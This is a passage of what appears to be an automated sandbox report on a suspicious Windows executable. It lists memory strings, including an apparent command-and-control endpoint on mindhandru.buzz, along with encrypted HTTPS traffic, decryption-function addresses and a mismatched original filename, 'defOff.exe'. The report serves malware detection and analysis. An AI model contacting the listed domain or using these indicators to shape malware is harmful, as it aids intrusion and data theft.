Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/s
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1629641938.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/tC
Source: 0zBsv1tnt4.exe, 00000000.00000003.1625297270.0000000005B6B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1626048164.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz/wK
Source: 0zBsv1tnt4.exe, 0zBsv1tnt4.exe, 00000000.00000003.1597724019.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1686505408.0000000001501000.00000004.00000020.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1597829853.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api
Source: 0zBsv1tnt4.exe, 00000000.00000003.1643121544.0000000001501000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/api;WU
Source: 0zBsv1tnt4.exe, 00000000.00000003.1621964923.00000000014EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mindhandru.buzz:443/apiz
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.6.dr	String found in binary or memory: https://schema.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_101.6.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 0zBsv1tnt4.exe, 00000000.00000003.1511672600.0000000005B18000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511529747.0000000005B1B000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511594000.0000000005B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_121.6.dr, chromecache_101.6.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566815903.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 0zBsv1tnt4.exe, 00000000.00000003.1566871619.0000000005E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: 0zBsv1tnt4.exe	Static PE information: section name:
Source: 0zBsv1tnt4.exe	Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe	Static PE information: section name: .idata

Detected potential crypto function

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009658D5	0_2_009658D5
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095B1AF	0_2_0095B1AF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00989280	0_2_00989280
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00973B50	0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097D34A	0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00977440	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00990460	0_2_00990460
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098C5A0	0_2_0098C5A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00971D00	0_2_00971D00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00990D20	0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095E687	0_2_0095E687
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00988EA0	0_2_00988EA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00958600	0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095CE45	0_2_0095CE45
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00972E6D	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00962750	0_2_00962750
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C09E	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009888B0	0_2_009888B0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096C8A0	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009838D0	0_2_009838D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097A0CA	0_2_0097A0CA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096B8F6	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C0E6	0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009660E9	0_2_009660E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096D003	0_2_0096D003
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095D83C	0_2_0095D83C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095D021	0_2_0095D021
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095C840	0_2_0095C840
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098F18B	0_2_0098F18B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097E180	0_2_0097E180
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009739B9	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009791AE	0_2_009791AE
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009781CC	0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009909E0	0_2_009909E0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C9EB	0_2_0097C9EB
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00B069CC	0_2_00B069CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00976910	0_2_00976910
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00955901	0_2_00955901
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C09E	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095397B	0_2_0095397B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00956160	0_2_00956160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096E960	0_2_0096E960
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00968169	0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00989A80	0_2_00989A80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00978ABC	0_2_00978ABC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00969AD0	0_2_00969AD0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009742D0	0_2_009742D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096E220	0_2_0096E220
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098DA4D	0_2_0098DA4D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00985A4F	0_2_00985A4F
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098CA40	0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00954270	0_2_00954270
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096EB80	0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009573D0	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009783D8	0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095F3C0	0_2_0095F3C0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00959310	0_2_00959310
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00968B1B	0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095AB40	0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00971340	0_2_00971340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097F377	0_2_0097F377
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00964CA0	0_2_00964CA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009704C6	0_2_009704C6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095D4F3	0_2_0095D4F3
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00981CF0	0_2_00981CF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009724E0	0_2_009724E0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00983C10	0_2_00983C10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098A440	0_2_0098A440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096747D	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00987DA9	0_2_00987DA9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098A5D4	0_2_0098A5D4
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00955DC0	0_2_00955DC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098CDF0	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096051B	0_2_0096051B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00989D30	0_2_00989D30
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097C53C	0_2_0097C53C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00976D2E	0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00961D2B	0_2_00961D2B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097CD5E	0_2_0097CD5E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097CD4C	0_2_0097CD4C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098FD70	0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00974560	0_2_00974560
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096AEB0	0_2_0096AEB0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009746D0	0_2_009746D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009906F0	0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096961B	0_2_0096961B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098FE00	0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0095F60D	0_2_0095F60D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096E630	0_2_0096E630
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00988650	0_2_00988650
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097FE74	0_2_0097FE74
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0097EE63	0_2_0097EE63
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00970E6C	0_2_00970E6C
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00959780	0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00975F1B	0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00979739	0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00966F52	0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00977740	0_2_00977740

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: String function: 00957F60 appears 40 times
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: String function: 00964C90 appears 74 times

Sample file is different than original file name gathered from version info

Source: 0zBsv1tnt4.exe	Binary or memory string: OriginalFilename vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753508017.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747939925.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753200505.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741106166.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748641218.0000000005F90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747377089.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755710718.00000000060CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742054561.00000000060F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742641403.0000000006055000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740839803.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742152200.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741014373.000000000602D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747522970.000000000608F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743489115.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741858552.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742744377.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745026931.000000000606F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749386939.00000000060A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740481105.0000000005F91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746607777.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756929032.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754904265.00000000060C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746479114.0000000006181000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741476081.00000000060D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754281518.00000000061EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744751091.0000000006068000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748897132.00000000061B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747118596.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743741710.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740389976.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749584722.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748356756.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744105460.0000000006064000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756772508.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743374680.0000000006123000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741958081.0000000006038000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747805245.000000000618E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742336878.0000000006043000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1871025265.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749848322.00000000060A2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742541445.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746989670.000000000608D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745145340.0000000005F89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753817708.00000000061F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1751446021.00000000060B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782533696.00000000014E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754126968.00000000060B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741669573.0000000006033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744232506.000000000613E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746090034.0000000006085000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743611102.0000000006059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755218944.00000000060C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743262102.000000000604C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741763407.00000000060E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740571438.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
